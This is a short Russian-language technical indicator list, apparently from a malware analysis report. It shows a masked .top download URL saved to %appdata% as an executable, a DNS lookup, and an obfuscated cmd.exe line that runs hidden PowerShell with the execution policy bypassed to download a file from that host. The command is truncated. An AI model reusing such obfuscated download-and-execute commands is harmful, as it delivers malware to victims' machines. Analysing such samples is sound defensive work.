Техническая информация
- http://zo###aseo.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owe^rS^hE^ll.Ex^e ^-eXE^CUTi^ONpOl^ic^y by^P^AsS -N^o^pr^oFi^lE ^-W^IndO^W^sTYLE^ hi^DD^en^ ^(neW^-OB^JECT^ SyS^te^M^.^NeT.w^eBClIeNT^).D^O^wn^L^oa^D^f^IL^E^('http://zo#...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "p^owe^rS^hE^ll.Ex^e ^-eXE^CUTi^ONpOl^ic^y by^P^AsS -N^o^pr^oFi^lE ^-W^IndO^W^sTYLE^ hi^DD^en^ ^(neW^-OB^JECT^ SyS^te^M^.^NeT.w^eBClIeNT^).D^O^wn^L^oa^D^f^IL^E^('http://zo#...' (со скрытым окном)